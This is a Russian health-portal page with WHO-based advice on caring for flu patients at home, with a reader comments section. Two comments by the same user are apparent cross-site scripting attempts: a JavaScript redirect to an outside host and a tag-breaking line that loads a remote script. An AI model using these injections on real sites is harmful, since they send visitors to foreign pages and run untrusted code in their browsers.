Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Уход за больными гриппом ...  >>  Уход за больными гриппом в домашних условиях
 
Обратная связь
 

Уход за больными гриппом в домашних условиях

Размер шрифта
08 октября 1998 17:48
  • google_analytics: false
  • Нравится



Во время пандемии для очень большого числа пациентов, обращающихся в медицинские учреждения, потребуется лечение в домашних условиях.


Больным людям без тяжелых симптомов и признаков гриппа необходимо оставаться дома, соблюдать «респираторный этикет» (закрывать салфеткой рот и нос при кашле и чихании, кашлять/чихать в рукав) и гигиену рук, а также, по возможности, ограничивать тесные контакты (в пределах примерно 1 м) с другими людьми.

Изолировать больных людей в стесненных домашних условиях может быть затруднительно. Тем не менее, необходимо максимально ограничить контакты больного с другими людьми. Чтобы избежать распространения инфекции, наблюдение за пациентом в домашних условиях должен обеспечивать, по возможности, только один человек.

Пациентов и лиц, осуществляющих уход за ними, следует обучить использованию и утилизации масок в течение инфекционного периода пациента. При ограниченных запасах важно, чтобы в домашних условиях маску в первую очередь надевал пациент, а не человек, ухаживающий за ним.

Нет необходимости носить маску весь день, ее следует надевать только при ожидающемся тесном контакте (в пределах примерно 1 м) с человеком, осуществляющим уход, или другими людьми. Маски, мокрые от выделений, необходимо безопасно утилизировать. При отсутствии масок можно использовать плотно прилегающие к лицу шарфы или маски многократного пользования из ткани, закрывающие рот и нос. Их необходимо менять, как только они становятся мокрыми, и стирать в воде с мылом.

При наличии достаточного количества масок лица, осуществляющие уход, также должны использовать их с тем, чтобы закрывать рот и нос при тесных контактах с больными людьми. После контакта с пациентом человек, осуществляющий уход за ним, должен всегда мыть руки.

Лицам, осуществляющим уход, необходимо оказать общую поддержку и дать советы в отношении использования лекарств, снижающих температуру (следует избегать использования ацетилсалициловой кислоты среди детей), оральных жидкостей, питания и постельного режима.

Необходимо иметь под рукой инструкции о том, как применять антибиотики (для борьбы с бактериальными осложнениями гриппа) в случае их назначения. Необходимо также иметь инструкции по уходу за больным в случае ухудшения его состояния (то есть, при появлении симптомов тяжелой болезни или обезвоживания).

Выздоровевшие люди больше не являются заразными и могут считаться невосприимчивыми к болезни (обычно через 2-3 недели после появления первых симптомов болезни).

Всем членам семьи необходимо соблюдать надлежащий «респираторный этикет» и гигиену рук. Держать окна открытыми и обеспечивать проветривание помещений/палаток. Поверхности в домах необходимо регулярно мыть водой с мылом или дезинфицирующим средством.

Когда необходима госпитализация

В большинстве случаев уход за больными людьми можно осуществлять в домашних условиях. Однако в случае ухудшения состояния или появления симптомов тяжелой болезни пациентам может потребоваться госпитализация.

Симптомы тяжелого заболевания:
• слабость/неспособность встать
сонливость
• бессознательное состояние
• судороги
• крайне затрудненное дыхание или дыхательная недостаточность
• неспособность пить жидкости и обезвоживание
• высокая температура

По материалам ВОЗ

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

25 июня 2015 в 21:27

Цитировать   |   Пожаловаться

=))))

2 - zzzzzz

25 июня 2015 в 21:28

Цитировать   |   Пожаловаться

=))))

3 - zzzzzz

25 июня 2015 в 21:42

Цитировать   |   Пожаловаться

8))))

4 - zzzzzz

25 июня 2015 в 21:44

Цитировать   |   Пожаловаться

>window.location.href="http://A25832-hostde3.fornex.org/";

5 - zzzzzz

30 июня 2015 в 19:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

01 июля 2015 в 00:59

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.